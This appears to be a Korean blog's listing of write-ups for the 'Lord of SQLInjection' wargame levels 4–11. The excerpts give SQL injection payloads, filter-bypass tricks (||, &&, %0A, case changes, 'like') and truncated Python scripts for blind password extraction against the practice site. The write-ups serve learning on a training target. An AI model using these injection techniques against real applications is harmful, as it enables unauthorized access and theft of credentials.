Los 썸네일형 리스트형 [LOS] 11번 golem 이번 문제는 golem이다. 이번 문제는 admin의 pw를 알아내는 문제이다. 근데 or, and, substr, 등호가 막혀있어서 우회해야 한다. 파이썬 코드로 작성하면 다음과 같다. 12345678910111213141516171819202122import requests URL = 'http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php' head = {'cookie' : ' '} def matching(num) : for i in range(1,num+1) : for j in range(32,127) : params = {'pw' : '\' || id like \'admin\' && ascii(mid(pw,%d,1)) like .. 더보기 [LOS] 10번 skeleton 이번에는 skeleton이다. 이번 문제는 id에 admin이 있으면 해결된다. ?pw=' or id='admin'%23 ?pw=' or id='admin' --%20 -- 나 # 을 이용해 주석처리 해주면 문제가 해결된다. -- 다음에는 공백이 있어야 하므로 %20을 같이 입력해줘야 한다. 문제 해결 더보기 [LOS] 9번 vampire 이번에는 vampire 이다. 이 문제도 8번 문제처럼 mysql의 특징을 이용해주면 된다. 문제 해결 더보기 [LOS] 8번 troll 이번 문제는 troll 이다. admin이 필터링 되어있다. mysql은 대소문자를 구분하지 않는다는 특징을 가지고 있다. 이러한 mysql 의 특징을 이용하여 풀면 된다. 따라서 admin 대신 ADMIN을 입력하면 된다. 문제 해결 더보기 [LOS] 7번 orge 이번 문제는 orge이다. admin의 pw를 알아내면 풀리는 문제이다. id가 admin일 때의 쿼리문이 참이 되면 Hello admin이라는 문구가 뜬다. 이를 이용해서 pw를 알아내면 된다. 파이썬 코드로 작성해보면 다음과 같다. 12345678910111213141516171819202122import requests URL = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php" head = {'cookie' : ' '} def matching(num) : for i in range(1,num+1) : for j in range(32,127) : params = {'pw' : '\' || id=\'admin\' && asci.. 더보기 [LOS] 6번 darkelf 이번 문제는 darkelf 이다. id가 admin이면 풀리는 문제인데 or, and가 필터링 되어있다. or와 and를 우회하면 된다. or는 ||, and는 &&와 같기 때문에 or 대신 || 을 입력해주면 문제가 풀린다. 문제 해결 더보기 [LOS] 5번 wolfman 이번 문제는 wolfman이다. id가 admin이면 해결인데 공백이 필터링 되어있다. ?pw=' or id='admin 공백을 우회해서 입력해주면 문제가 풀린다. 공백 들어갈 자리에 라인피드를 넣어주면 된다. 라인피드는 아스키코드로 0A이기 때문에 %0A를 입력해주면 된다. 문제 해결 공백을 입력해주지 않고 or 을 뜻하는 '||' 이 기호를 입력해줘도 문제 해결 더보기 [LOS] 4번 orc 이번 문제는 orc이다. 이 문제는 admin의 pw를 알아내야 해결할 수 있는 문제이다. 쿼리문을 이용해 pw의 길이를 알아냈다. 8글자이다. 위의 쿼리문처럼 참이 되는 경우를 알아내며 admin의 pw를 찾아낼 수 있다. 찾아낸 pw는 295d5844 이다. 하나하나 다 찾기 힘들면 파이썬으로 코드를 작성할 수 있다. 123456789101112131415161718192021import requests URL = 'http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php'head = {'cookie' : ' '} def matching(num) : for i in range(1,num+1) : for j in range(32,127) :.. 더보기 이전 1 2 다음
